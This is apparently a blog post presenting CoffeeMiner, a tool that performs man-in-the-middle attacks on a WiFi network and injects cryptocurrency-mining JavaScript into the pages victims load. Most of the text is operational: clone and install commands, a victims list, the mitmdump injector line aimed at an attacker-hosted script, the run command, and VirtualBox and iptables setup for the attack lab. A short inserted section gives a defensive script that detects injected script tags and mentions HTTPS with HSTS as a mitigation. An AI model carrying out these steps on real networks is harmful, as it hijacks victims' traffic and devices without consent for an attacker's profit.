
Cryptocurrency miners are on the rise compared with the previous year: nearly 600 million computers are continually mining cryptocurrency through their browsers without the user's knowledge. CoffeeMiner works differently. It intercepts traffic and injects JavaScript into the HTML pages that victims request, and that JavaScript forces all devices connected to the WiFi network to mine cryptocurrency for an attacker.
Concept:
- Performs a MITM attack on all selected victims
- Injects a JS script into all the HTML pages requested by the victims
- The injected JS script contains a cryptocurrency miner
- All victim devices connected to the LAN will be mining for the CoffeeMiner
How To Use CoffeeMiner – WiFi MITM Cryptocurrency Mining Pool
First, we're going to download (git clone) CoffeeMiner.
$ git clone https://github.com/arnaucode/coffeeMiner.git
After that, we're going to run the 'install.sh' bash file.
- install.sh
$ bash install.sh
- edit victims.txt with one IP per line
- edit coffeeMiner.py, line 28, with the coffeeMiner httpserver IP:
os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T")
When everything is completed, we simply execute the coffeeMiner.py file.
- execute coffeeMiner.py
$ python3 coffeeMiner.py ipgateway
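From the defender's side, the injection described above leaves a visible trace: a `<script>` tag that the origin server never sent, typically loaded from a LAN address like the httpserver URL in the mitmdump line. The following is an added example, not part of CoffeeMiner or the original post; the function names are hypothetical and the sample pages are constructed. It compares a page fetched over a trusted link with the same page as seen on the suspect network.

```python
from html.parser import HTMLParser
from ipaddress import ip_address
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect the src of every <script> tag in a page."""
    def __init__(self):
        super().__init__()
        self.sources = set()

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag == "script" and src:
            self.sources.add(src)


def script_sources(html):
    parser = ScriptCollector()
    parser.feed(html)
    return parser.sources


def is_private_host(url):
    """True when the URL's host is a literal private or loopback IP."""
    try:
        return ip_address(urlparse(url).hostname).is_private
    except (ValueError, TypeError):
        return False  # DNS name, relative URL, or no host at all


def injected_scripts(baseline_html, observed_html):
    """Scripts in the observed page that the trusted baseline lacks."""
    extra = script_sources(observed_html) - script_sources(baseline_html)
    return sorted(
        (src, "private-ip-host" if is_private_host(src) else "not-in-baseline")
        for src in extra
    )


# Constructed sample pages: trusted baseline vs. the page on the suspect LAN.
BASELINE = '<html><head><script src="/static/app.js"></script></head><body>hi</body></html>'
OBSERVED = ('<html><head><script src="/static/app.js"></script></head><body>hi'
            '<script src="http://10.0.2.20:8000/script.js"></script></body></html>')

if __name__ == "__main__":
    for src, reason in injected_scripts(BASELINE, OBSERVED):
        print(f"{reason}: {src}")
```

This kind of injection only works on pages delivered over plain HTTP, so serving sites over HTTPS with HSTS removes the opportunity altogether.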
Instructions to set up the VirtualBox scenario
On each machine, remember to set up the DNS server, for example in /etc/resolv.conf:
nameserver 8.8.8.8
Victim
- network adapter:
- Host-only Adapter
- /etc/network/interfaces:
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
    address 10.0.2.20
    netmask 255.255.255.0
    gateway 10.0.2.15
Attacker
- network adapter:
- Host-only Adapter
- /etc/network/interfaces:
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
    address 10.0.2.10
    netmask 255.255.255.0
    gateway 10.0.2.15
Gateway
- network adapter:
- Bridged Adapter
- Host-only Adapter
- /etc/network/interfaces:
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet dhcp
auto eth1
iface eth1 inet static
    address 10.0.2.15
    netmask 255.255.255.0
Clean IPTABLES:
iptables --flush
iptables --table nat --flush
Configure the Gateway machine as a router:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT
iptables -A FORWARD -i eth1 -o eth0 -j ACCEPT